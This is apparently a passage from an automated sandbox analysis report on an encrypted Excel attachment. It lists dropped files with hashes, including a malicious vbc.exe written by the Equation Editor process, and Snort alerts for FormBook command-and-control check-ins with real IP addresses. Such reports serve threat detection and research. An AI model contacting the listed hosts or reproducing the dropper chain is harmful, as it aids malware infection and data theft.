                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\800413FC.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):49744
                                                    Entropy (8bit):7.99056926749243
                                                    Encrypted:true
                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                    Malicious:false
                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF2A565F.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                    Category:dropped
                                                    Size (bytes):8815
                                                    Entropy (8bit):7.944898651451431
                                                    Encrypted:false
                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                    Malicious:false
                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B69A6DE1.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):84203
                                                    Entropy (8bit):7.979766688932294
                                                    Encrypted:false
                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9553C63.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):33795
                                                    Entropy (8bit):7.909466841535462
                                                    Encrypted:false
                                                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                    Malicious:false
                                                    Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBBD63B0.emf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):648132
                                                    Entropy (8bit):2.812168424230982
                                                    Encrypted:false
                                                    SSDEEP:3072:x34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:54UcLe0JOcXuunhqcS
                                                    MD5:8E7B38167FCDE93FC04ED4CAD908559E
                                                    SHA1:2D21C75978F0F40BBA73BC44344EB13EBA5ACF5E
                                                    SHA-256:A4568E97793E29556DDBDD1CC486F874D7F67AD0B09A829EDABA71DD568FF1AE
                                                    SHA-512:06DCE21B10DDCF77E3961B5BE2570F0CEAB8254C8488E524E1E6F692B5CD96A659AFF2201698C00010A768E96845C606A7217983ADB99492B7362196E095C6AD
                                                    Malicious:false
                                                    Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$.......-z.X.@6.%...............(........N.Z(... ................N.Z(... ... ....y.X ...(... ............z.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X... ...T..............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD19276A.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):6815
                                                    Entropy (8bit):7.871668067811304
                                                    Encrypted:false
                                                    SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                    MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                    SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                    SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                    SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE9B8D60.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                    Category:dropped
                                                    Size (bytes):7006
                                                    Entropy (8bit):7.000232770071406
                                                    Encrypted:false
                                                    SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                    MD5:971312D4A6C9BE9B496160215FE59C19
                                                    SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                    SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                    SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                    Malicious:false
                                                    Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5525.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                    Category:dropped
                                                    Size (bytes):1254
                                                    Entropy (8bit):5.835900066445133
                                                    Encrypted:false
                                                    SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                    MD5:A3C62E516777C15BF216F12143693C61
                                                    SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                    SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                    SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                    Malicious:false
                                                    Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5526.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                    Category:dropped
                                                    Size (bytes):1254
                                                    Entropy (8bit):5.835900066445133
                                                    Encrypted:false
                                                    SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                    MD5:A3C62E516777C15BF216F12143693C61
                                                    SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                    SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                    SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                    Malicious:false
                                                    Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5527.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                    Category:dropped
                                                    Size (bytes):1254
                                                    Entropy (8bit):5.835900066445133
                                                    Encrypted:false
                                                    SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                    MD5:A3C62E516777C15BF216F12143693C61
                                                    SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                    SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                    SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                    Malicious:false
                                                    Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF660.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                    Category:dropped
                                                    Size (bytes):1254
                                                    Entropy (8bit):5.835900066445133
                                                    Encrypted:false
                                                    SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                    MD5:A3C62E516777C15BF216F12143693C61
                                                    SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                    SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                    SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                    Malicious:false
                                                    Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF661.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                    Category:dropped
                                                    Size (bytes):1254
                                                    Entropy (8bit):5.835900066445133
                                                    Encrypted:false
                                                    SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                    MD5:A3C62E516777C15BF216F12143693C61
                                                    SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                    SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                    SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                    Malicious:false
                                                    Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF662.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                    Category:dropped
                                                    Size (bytes):1254
                                                    Entropy (8bit):5.835900066445133
                                                    Encrypted:false
                                                    SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                    MD5:A3C62E516777C15BF216F12143693C61
                                                    SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                    SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                    SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                    Malicious:false
                                                    Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                    C:\Users\user\Desktop\~$COAU7229898130.xlsx
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):330
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                    Malicious:true
                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    C:\Users\Public\vbc.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):687616
                                                    Entropy (8bit):7.451356907663552
                                                    Encrypted:false
                                                    SSDEEP:12288:D1sWHCM2K4CmI/yzQs2TaIpIYshi/YJGsyT4/vCnacxPWJPHS62LbzxI:Bc3CrMIpIzkwWh0qRP9I
                                                    MD5:9F2C198407F1A7D058C06CC174817DB6
                                                    SHA1:24EF8B3C123FB588BB05AE56DFDC19F14B6F22D5
                                                    SHA-256:BD6ECBC27DE051FAB2F753669D77611D137486537358EE6B3C46ED3950D21CEB
                                                    SHA-512:EABB799B26ED02EEB7AAE604AFC5843F27B3E8610D85509EA02BE8BA9421A068CE64F8DE3D903E617520B80E458964CF259210BF0EF282B7CFEF5BB4B0317544
                                                    Malicious:true
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.Aa..............0......n......"-... ...@....@.. ....................................@..................................,..O....@...k........................................................................... ............... ..H............text...(.... ...................... ..`.rsrc....k...@...l..................@..@.reloc...............|..............@..B.................-......H...........(.......Q...(+...............................................0............}.....(.......(......r...p.(....(....o......{.....(....o......{....r...p.(....(....o......{.....(....o......{.....(....o......{.....(....o.....*...0.._........(.........(.....o............,)....t......o....r-..p(......,..o......+..(....o....(......+...*..0...........(....o....o ...o!....+..*...0..:........(.........(.....o............,.r-..p.+....t....o"....+..*...0..:........(.........(....

                                                    Static File Info

                                                    General

                                                    File type:CDFV2 Encrypted
                                                    Entropy (8bit):7.988054339763774
                                                    TrID:
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                    File name:COAU7229898130.xlsx
                                                    File size:601600
                                                    MD5:6440075843d5ae28dfccf6c9b09830c2
                                                    SHA1:fb5ea7b3defc0c15177429caaf45cdddd80cac7c
                                                    SHA256:22c19360c2a9ee4aaa12439aa1c3ace0ecc3287e0b61481f21619e4bb69f5157
                                                    SHA512:04b09e4ef477126c4577a91596b11e6e7a1366ada0048dda785fdcee273f494d816996403e74dd52608ab250b948506c579a446d0b7aff21d1e2b7c54278e27e
                                                    SSDEEP:12288:s4UFZBVSY6MDwTVhlNf96Vw6GlCzhxNCxvIxtCbI2nUMbMqZvsQo:sHffg1x/lo0vIxtCbIUUMb7ZK
                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    09/15/21-11:14:57.679285TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                    09/15/21-11:14:57.679285TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                    09/15/21-11:14:57.679285TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                    09/15/21-11:14:57.794921TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22
                                                    09/15/21-11:15:02.867903TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22192.0.78.25
                                                    09/15/21-11:15:02.867903TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22192.0.78.25
                                                    09/15/21-11:15:02.867903TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22192.0.78.25

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 15, 2021 11:13:26.214360952 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:26.509294987 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:26.509390116 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:26.509690046 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:26.805563927 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:26.805607080 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:26.805624962 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:26.805648088 CEST8049165103.133.106.199192.168.2.22
